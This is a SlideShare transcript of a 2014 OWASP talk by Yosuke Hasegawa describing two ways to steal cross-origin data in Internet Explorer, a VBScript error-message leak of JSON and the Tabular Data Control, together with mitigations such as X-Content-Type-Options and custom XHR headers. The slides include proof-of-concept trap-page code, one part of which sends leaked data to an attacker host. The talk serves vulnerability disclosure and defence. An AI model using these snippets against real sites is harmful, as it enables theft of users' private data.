SlideShare a Scribd company logo

Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014

Y
Yosuke HASEGAWA
1 of 18
Download to read offline
Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA
About Me Yosuke HASEGAWA @hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member
Agenda Cross-Origin information disclosure Not XSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control
VBScript Error message
VBScript Error Msg VBScript Error Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message
VBScript Error Msg Reading JSON as VBScript src fail → raises exception // Trap page by attacker <script src="http://example.jp/target.json" language="vbscript"> </script> HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [ "secret", "data", "is", "here" ]
VBScript Error Msg catch error msg with error handler GET http://attacker.utf-8.jp/log?Type%20mismatch:%20' %20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1 Referer: http://attacker.utf-8.jp/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) <script> window.onerror = function( e ){ document.getElementById( "img" ).setAttribute( "src", "http://attacker.utf-8.jp/log?" + e ); } </script> <script src="http://example.jp/target.json" language="vbscript"></script>
Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]
VBScript Error Msg supplementary supplementary Dec 2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.
Tabular Data Control
Tabular Data Control Tabular Data Control - TDC ActiveX Control for binding text file into HTML as data table http://msdn.microsoft.com/en-us/library/ms531356.aspx Enabled by default on IE6-IE11, with older doc-mode <meta http-equiv="x-ua-compatible" content="IE=10"> Spotlighted by Cure53 X-Mas Challenge https://cure53.de/xmas2013/ https://cure53.de/xmas2013/writeup The winner is @kinugawamasato
Tabular Data Control // Trap page by attacker on attacker.utf-8.jp function show(){ var s = document.getElementById("tdc") .recordset.getString(); alert( s ); } ... <meta http-equiv="x-ua-compatible" content="IE=10" > <object id="tdc" ondatasetcomplete="show()" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://example.jp/target.txt"> </object> //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
Tabular Data Control Attacker has to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment
Countermeasure Countermeasure Restrict access to XHR request with custom X header and / or... var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest
Countermeasure(cont.) Countermeasure (cont.) Don't allow to place text by attacker into top of the content //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
Conclusion
Conclusion Conclusion IE has funny behavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header
Question ? Question ? hasegawa@utf-8.jp @hasegawayosuke http://utf-8.jp/

Recommended

CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...PROIDEA
 
How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )Katy Slemon
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方Hiroshi Tokumaru
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 

Recommended

CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...PROIDEA
 
How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )How to Make Your NodeJS Application Secure (24 Best Security Tips )
How to Make Your NodeJS Application Secure (24 Best Security Tips )Katy Slemon
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方Hiroshi Tokumaru
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 
Web security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in BrowsersWeb security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in BrowsersPhú Phùng
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Java ist doch schon sicher?!
Java ist doch schon sicher?!Java ist doch schon sicher?!
Java ist doch schon sicher?!BridgingIT GmbH
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiCypSec - Siber Güvenlik Konferansı
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps SecurityVictor Bucutea
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
42 minutes to secure your code....
42 minutes to secure your code....42 minutes to secure your code....
42 minutes to secure your code....Sebastien Gioria
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Matt Raible
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudArun Gupta
 
Web security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsersWeb security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsersPhú Phùng
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossHibino Hisashi
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingDilan Warnakulasooriya
 

More Related Content

What's hot

Web security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in BrowsersWeb security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in BrowsersPhú Phùng
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Java ist doch schon sicher?!
Java ist doch schon sicher?!Java ist doch schon sicher?!
Java ist doch schon sicher?!BridgingIT GmbH
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
42 minutes to secure your code....
42 minutes to secure your code....42 minutes to secure your code....
42 minutes to secure your code....Sebastien Gioria
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Matt Raible
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudArun Gupta
 
Web security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsersWeb security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsersPhú Phùng
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossHibino Hisashi
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 

What's hot (20)

Web security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in BrowsersWeb security: Securing Untrusted Web Content in Browsers
Web security: Securing Untrusted Web Content in Browsers
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS Application
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Java ist doch schon sicher?!
Java ist doch schon sicher?!Java ist doch schon sicher?!
Java ist doch schon sicher?!
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
 
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
42 minutes to secure your code....
42 minutes to secure your code....42 minutes to secure your code....
42 minutes to secure your code....
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
 
Web security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsersWeb security: Securing untrusted web content at browsers
Web security: Securing untrusted web content at browsers
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with oss
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 

Similar to Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014

XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享Chia Wei Tsai
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Xlator
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Cyber Security Alliance
 
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETSilicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETMats Bryntse
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 securityHuang Toby
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 

Similar to Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014 (20)

XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享
 
前端概述
前端概述前端概述
前端概述
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
 
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETSilicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 security
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 

More from Yosuke HASEGAWA

次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)Yosuke HASEGAWA
 
JavaScript難読化読経
JavaScript難読化読経JavaScript難読化読経
JavaScript難読化読経Yosuke HASEGAWA
 
ES6時代におけるWeb開発者とセキュリティ業界の乖離
ES6時代におけるWeb開発者とセキュリティ業界の乖離ES6時代におけるWeb開発者とセキュリティ業界の乖離
ES6時代におけるWeb開発者とセキュリティ業界の乖離Yosuke HASEGAWA
 
他人事ではないWebセキュリティ
他人事ではないWebセキュリティ他人事ではないWebセキュリティ
他人事ではないWebセキュリティYosuke HASEGAWA
 
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIHTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIYosuke HASEGAWA
 
Chrome-eject がこの先生きのこるには
Chrome-eject がこの先生きのこるにはChrome-eject がこの先生きのこるには
Chrome-eject がこの先生きのこるにはYosuke HASEGAWA
 
[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見Yosuke HASEGAWA
 
WindowsユーザのためのはじめてのPerlプログラミング
WindowsユーザのためのはじめてのPerlプログラミングWindowsユーザのためのはじめてのPerlプログラミング
WindowsユーザのためのはじめてのPerlプログラミングYosuke HASEGAWA
 

More from Yosuke HASEGAWA (8)

次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
 
JavaScript難読化読経
JavaScript難読化読経JavaScript難読化読経
JavaScript難読化読経
 
ES6時代におけるWeb開発者とセキュリティ業界の乖離
ES6時代におけるWeb開発者とセキュリティ業界の乖離ES6時代におけるWeb開発者とセキュリティ業界の乖離
ES6時代におけるWeb開発者とセキュリティ業界の乖離
 
他人事ではないWebセキュリティ
他人事ではないWebセキュリティ他人事ではないWebセキュリティ
他人事ではないWebセキュリティ
 
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIHTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
 
Chrome-eject がこの先生きのこるには
Chrome-eject がこの先生きのこるにはChrome-eject がこの先生きのこるには
Chrome-eject がこの先生きのこるには
 
[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見
 
WindowsユーザのためのはじめてのPerlプログラミング
WindowsユーザのためのはじめてのPerlプログラミングWindowsユーザのためのはじめてのPerlプログラミング
WindowsユーザのためのはじめてのPerlプログラミング
 

Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014

  • 1. Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA
  • 2. About Me Yosuke HASEGAWA @hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member
  • 3. Agenda Cross-Origin information disclosure Not XSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control
  • 5. VBScript Error Msg VBScript Error Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message
  • 6. VBScript Error Msg Reading JSON as VBScript src fail → raises exception // Trap page by attacker <script src="http://example.jp/target.json" language="vbscript"> </script> HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [ "secret", "data", "is", "here" ]
  • 7. VBScript Error Msg catch error msg with error handler GET http://attacker.utf-8.jp/log?Type%20mismatch:%20' %20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1 Referer: http://attacker.utf-8.jp/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) <script> window.onerror = function( e ){ document.getElementById( "img" ).setAttribute( "src", "http://attacker.utf-8.jp/log?" + e ); } </script> <script src="http://example.jp/target.json" language="vbscript"></script>
  • 8. Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]
  • 9. VBScript Error Msg supplementary supplementary Dec 2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.
  • 11. Tabular Data Control Tabular Data Control - TDC ActiveX Control for binding text file into HTML as data table http://msdn.microsoft.com/en-us/library/ms531356.aspx Enabled by default on IE6-IE11, with older doc-mode <meta http-equiv="x-ua-compatible" content="IE=10"> Spotlighted by Cure53 X-Mas Challenge https://cure53.de/xmas2013/ https://cure53.de/xmas2013/writeup The winner is @kinugawamasato
  • 12. Tabular Data Control // Trap page by attacker on attacker.utf-8.jp function show(){ var s = document.getElementById("tdc") .recordset.getString(); alert( s ); } ... <meta http-equiv="x-ua-compatible" content="IE=10" > <object id="tdc" ondatasetcomplete="show()" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://example.jp/target.txt"> </object> //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
  • 13. Tabular Data Control Attacker has to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment
  • 14. Countermeasure Countermeasure Restrict access to XHR request with custom X header and / or... var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest
  • 15. Countermeasure(cont.) Countermeasure (cont.) Don't allow to place text by attacker into top of the content //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
  • 17. Conclusion Conclusion IE has funny behavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header